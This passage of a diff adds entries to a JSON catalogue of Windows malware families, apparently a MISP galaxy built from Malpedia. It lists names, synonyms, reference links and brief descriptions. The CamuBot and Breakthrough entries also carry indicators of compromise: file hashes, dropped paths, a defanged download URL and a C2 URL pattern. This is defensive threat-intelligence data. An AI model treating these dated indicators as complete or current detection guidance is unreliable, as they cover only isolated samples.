"23398248-a52a-4a7c-af10-262822d33a4e", + "value": "backspace", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap", + "https://securityintelligence.com/backswap-malware-now-targets-six-banks-in-spain/", + "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/", + "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/", + "https://www.cert.pl/en/news/single/backswap-malware-analysis/" + ] + }, + "uuid": "4ec40af9-0295-4b9a-81ad-b7017a21609d", + "value": "BackSwap", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript", + "https://twitter.com/PhysicalDrive0/status/833067081981710336" + ] + }, + "uuid": "af1c99be-e55a-473e-abed-726191e1da05", + "value": "BadEncript", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + ] + }, + "uuid": "1eceb5c0-3a01-43c2-b204-9957b15cf763", + "value": "badflick", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews", + "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", + "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1", + "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/" + ] + }, + "uuid": "f28fa5ca-9466-410c-aa32-4bd102f3f0e1", + "value": "BadNews", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle" + ] + }, + "uuid": "f09af1cc-cf9d-499a-9026-e783a3897508", + "value": "Bagle", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bahamut", + "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", + "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" + ] + }, + "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", + "value": "Bahamut", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix", + "https://www.cert.pl/en/news/single/banatrix-an-indepth-look/" + ] + }, + "uuid": "721fe429-f240-4fd6-a5c9-187195624b51", + "value": "Banatrix", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat", + "https://www.slideshare.net/YuryChemerkin/appendix-c-digital-the-malware-arsenal" + ] + }, + "uuid": "5c3c53ff-c81f-4daa-9b60-672650046ed7", + "value": "bangat", + "description": "" + }, + { + "meta": { + "synonyms": [ + "MultiBanker 2", + "BankPatch", + "BackPatcher" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori", + "http://blog.kleissner.org/?p=69", + "http://osint.bambenekconsulting.com/feeds/", + "http://blog.kleissner.org/?p=192", + "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/" + ] + }, + "uuid": "137cde28-5c53-489b-ad0b-d0fa2e342324", + "value": "Banjori", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot", + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF", + "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/" + ] + }, + "uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886", + "value": "Bankshot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart" + ] + }, + "uuid": "1dfd3ba6-7f82-407f-958d-c4a2ac055123", + "value": "Bart", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper", + "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html" + ] + }, + "uuid": "b74747e0-59ac-4adf-baac-78213a234ff5", + "value": "BatchWiper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel" + ] + }, + "uuid": "3900aa45-a7ff-48cc-9ac0-58c7c372991e", + "value": "Batel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat", + "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" + ] + }, + "uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a", + "value": "BBSRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep" + ] + }, + "uuid": "af338ac2-8103-4419-8393-fb4f3b43af4b", + "value": "Bedep", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.beendoor", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" + ] + }, + "uuid": "e2dca2b5-7ca0-4654-ae3d-91dab60dfd90", + "value": "beendoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos", + "https://www.morphick.com/resources/news/bernhardpos-new-pos-malware-discovered-morphick" + ] + }, + "uuid": "e59d1d3a-6c23-4684-8be1-2f182f63ab41", + "value": "BernhardPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Neurevt" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot", + "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39", + "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html", + "http://www.xylibox.com/2015/04/betabot-retrospective.html", + "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref", + "https://www.arbornetworks.com/blog/asert/beta-bot-a-code-review/", + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en", + "http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html", + "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39" + ] + }, + "uuid": "837c5618-69dc-4817-8672-b3d7ae644f5c", + "value": "BetaBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bfbot" + ] + }, + "uuid": "95b454f6-8ffb-4ef7-8a91-14d48601a899", + "value": "BfBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates", + "https://securelist.com/versatile-ddos-trojan-for-linux/64361/", + "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf", + "https://habrahabr.ru/post/213973/" + ] + }, + "uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6", + "value": "BillGates", + "description": "BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.\r\n\r\nBillGates is available for *nix-based systems as well as for Windows.\r\n\r\nOn Windows, the (Bill)Gates installer typically contains the various modules as linked resources." + }, + { + "meta": { + "synonyms": [ + "zxdosml" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "f98b4092-5f32-407c-9015-2da787d70c64", + "value": "Biscuit", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran", + "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html" + ] + }, + "uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc", + "value": "Bitsran", + "description": "" + }, + { + "meta": { + "synonyms": [ + "bwin3_bka" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner", + "https://www.evild3ad.com/405/bka-trojaner-ransomware/" + ] + }, + "uuid": "ea06f87c-148c-49e5-afec-7012cb2b4f0a", + "value": "BKA Trojaner", + "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy", + "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/", + "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", + "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/" + ] + }, + "uuid": "82c644ab-550a-4a83-9b35-d545f4719069", + "value": "BlackEnergy", + "description": "" + }, + { + "meta": { + "synonyms": [ + "POSWDS", + "Reedum", + "Kaptoxa" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/" + ] + }, + "uuid": "1e62fc1f-daa7-416f-9159-099798bb862c", + "value": "BlackPOS", + "description": "BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials. " + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution", + "https://www.arbornetworks.com/blog/asert/the-revolution-will-be-written-in-delphi/" + ] + }, + "uuid": "6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8", + "value": "BlackRevolution", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades", + "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/", + "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/", + "https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/", + "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" + ] + }, + "uuid": "0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b", + "value": "BlackShades", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe", + "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/" + ] + }, + "uuid": "2f11eb73-4faa-48c5-b217-11e139962c6f", + "value": "Boaxxe", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini" + ] + }, + "uuid": "444ca9d1-7128-40fa-9665-654194dfbe0b", + "value": "Bohmini", + "description": "" + }, + { + "meta": { + "synonyms": [ + "KBOT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek", + "https://asert.arbornetworks.com/communications-bolek-trojan/", + "http://www.cert.pl/news/11379" + ] + }, + "uuid": "d3af810f-e657-409c-b821-4b1cf727ad18", + "value": "Bolek", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "80487bca-7629-4cb2-bf5b-993d5568b699", + "value": "Bouncer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok", + "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html" + ] + }, + "uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d", + "value": "Bozok", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul", + "https://www.us-cert.gov/ncas/alerts/TA18-149A", + "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", + "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" + ] + }, + "uuid": "d97ae60e-612a-4feb-908a-8c4d32e9d763", + "value": "Brambul", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" + ] + }, + "uuid": "fbed27da-551d-4793-ba7e-128256326909", + "value": "BravoNC", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader", + "https://malpedia.caad.fkie.fraunhofer.de" + ] + }, + "uuid": "a05b8e4b-a686-439f-8094-037fbcda52bd", + "value": "Breakthrough", + "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab", + "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html", + "https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/" + ] + }, + "uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90", + "value": "Bredolab", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos", + "https://www.fireeye.com/blog/threat-research/2014/07/brutpos-rdp-bruteforcing-botnet-targeting-pos-systems.html" + ] + }, + "uuid": "e413c33a-badd-49a1-8d44-c9a0983b5151", + "value": "BrutPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://github.com/nccgroup/Royal_APT" + ] + }, + "uuid": "35e00ff0-704e-4e61-b9bb-9ed20a4a008f", + "value": "BS2005", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware", + "https://www.bleepingcomputer.com/news/security/new-nuclear-btcware-ransomware-released-updated/" + ] + }, + "uuid": "d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8", + "value": "BTCWare", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bugat_alreadydump" + ] + }, + "uuid": "16794655-c0e2-4510-9169-f862df104045", + "value": "Bugat", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Ratopak" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap", + "https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/", + "https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack", + "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf", + "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/" + ] + }, + "uuid": "fa278536-8293-4717-86b5-8a03aa11063f", + "value": "Buhtrap", + "description": "" + }, + { + "meta": { + "synonyms": [ + "R2D2", + "0zapftis" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner", + "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf", + "http://www.stoned-vienna.com/analysis-of-german-bundestrojaner.html", + "https://www.f-secure.com/weblog/archives/00002249.html", + "https://www.f-secure.com/weblog/archives/00002249.html" + ] + }, + "uuid": "04aeda9f-7923-45d1-ab74-9dddd8612d47", + "value": "Bundestrojaner", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu", + "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/", + "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/", + "http://malware-traffic-analysis.net/2017/05/09/index.html", + "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/" + ] + }, + "uuid": "4350b52a-8100-49b5-848d-d4a4029e949d", + "value": "Bunitu", + "description": "Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72)." + }, + { + "meta": { + "synonyms": [ + "spyvoltar" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat", + "http://antivirnews.blogspot.com/2011/01/backdoorwin32-buteratafj.html" + ] + }, + "uuid": "cd4ee7f0-394e-4129-a1dc-d5fb423f2311", + "value": "Buterat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus" + ] + }, + "uuid": "69a3e0ed-1727-4a9c-ae21-1e32322ede93", + "value": "Buzus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan" + ] + }, + "uuid": "12886243-55b6-4864-bf7a-7e2439e3a4c1", + "value": "BYEBY", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0" + ] + }, + "uuid": "b6b187d0-e19f-489a-91c0-7c94519555f6", + "value": "c0d0so0", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart" + ] + }, + "uuid": "fe1d51d8-f0e8-4f71-bf5c-724f7d4a824c", + "value": "CabArt", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Cadelle" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf" + ] + }, + "uuid": "cad83c5e-2081-4ab4-81c7-32cfc16eae66", + "value": "CadelSpy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.camubot", + "https://securityintelligence.com/camubot-new-financial-malware-targets-brazilian-banking-customers/" + ] + }, + "uuid": "ecac83ab-cd64-4def-979a-40aeeca0400b", + "value": "CamuBot", + "description": "There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :\r\n\r\nCamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479\r\n\r\nDropped Files on disk :\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8\r\n\r\nC:\\ProgramData\\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190\r\n\r\nProtecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi\r\n\r\nA new driver is installed : C:\\Windows\\system32\\drivers\\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8\r\n\r\nftusbload2.sys set 28 IRP handlers." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cannibal_rat", + "http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html" + ] + }, + "uuid": "1e722d81-085e-4beb-8901-aa27fe502dba", + "value": "Cannibal Rat", + "description": "Cannibal Rat is a python written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable." + }, + { + "meta": { + "synonyms": [ + "Anunak" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak", + "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf", + "https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf", + "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html" + ] + }, + "uuid": "8c246ec4-eaa5-42c0-b137-29f28cbb6832", + "value": "Carbanak", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp" + ] + }, + "uuid": "8f0d4866-7c67-4376-a6f2-958224d3c9d0", + "value": "Carberp", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412" + ] + }, + "uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e", + "value": "Cardinal RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.casper", + "https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/" + ] + }, + "uuid": "3198501e-0ff0-43b7-96f0-321b463ab656", + "value": "Casper", + "description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" + ] + }, + "uuid": "8060dbdc-cf31-40bc-9900-eb8119423c50", + "value": "Catchamas", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor", + "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities", + "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/", + "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/", + "https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident", + "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html", + "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/", + "https://blog.avast.com/progress-on-ccleaner-investigation", + "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms", + "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer", + "https://twitter.com/craiu/status/910148928796061696", + "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident", + "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor", + "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/", + "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html" + ] + }, + "uuid": "c51ee09b-fc2d-41fd-a43b-426a4f337139", + "value": "CCleaner Backdoor", + "description": "" + }, + { + "meta": { + "synonyms": [ + "cerebrus" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.centerpos", + "https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html" + ] + }, + "uuid": "fca8c5e0-4fef-408c-bcd7-9826271e8e5d", + "value": "CenterPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber", + "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/", + "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/", + "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/", + "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html" + ] + }, + "uuid": "79a7203a-6ea5-4c39-abd4-faa20cf8821a", + "value": "Cerber", + "description": "A prolific ransomware which originally added \".cerber\" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of of UDP activity to checkin and report infections. Primarily uses TOR for payment information." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner" + ] + }, + "uuid": "ba7706c1-7d2a-4031-9acc-cb862860da1a", + "value": "Cerbu", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Ham Backdoor" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches", + "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html", + "https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html", + "https://www.jpcert.or.jp/magazine/acreport-ChChes.html", + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" + ] + }, + "uuid": "6eee9bf9-ffce-4c88-a5ad-9d80f6fc727c", + "value": "ChChes", + "description": "" + }, + { + "meta": { + "synonyms": [ + "cherrypickerpos", + "cherrypicker", + "cherry_picker" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/" + ] + }, + "uuid": "e6ab90d3-8011-4927-a0cd-eab57e7971aa", + "value": "CherryPicker POS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca", + "http://vinsula.com/2014/03/01/chewbacca-tor-based-pos-malware/" + ] + }, + "uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493", + "value": "ChewBacca", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad" + ] + }, + "uuid": "098cfb93-8921-48f0-a694-a83f350e8a61", + "value": "Chinad", + "description": "Adware that shows advertisements using plugin techniques for popular browsers" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chir" + ] + }, + "uuid": "59b5697a-5154-4c08-87f8-c71b0e8425fc", + "value": "Chir", + "description": "" + }, + { + "meta": { + "synonyms": [ + "AndroKINS" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic", + "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", + "https://www.s21sec.com/en/blog/2017/07/androkins/", + "https://securelist.com/chthonic-a-new-modification-of-zeus/68176/" + ] + }, + "uuid": "9441a589-e23d-402d-9603-5e55e3e33971", + "value": "Chthonic", + 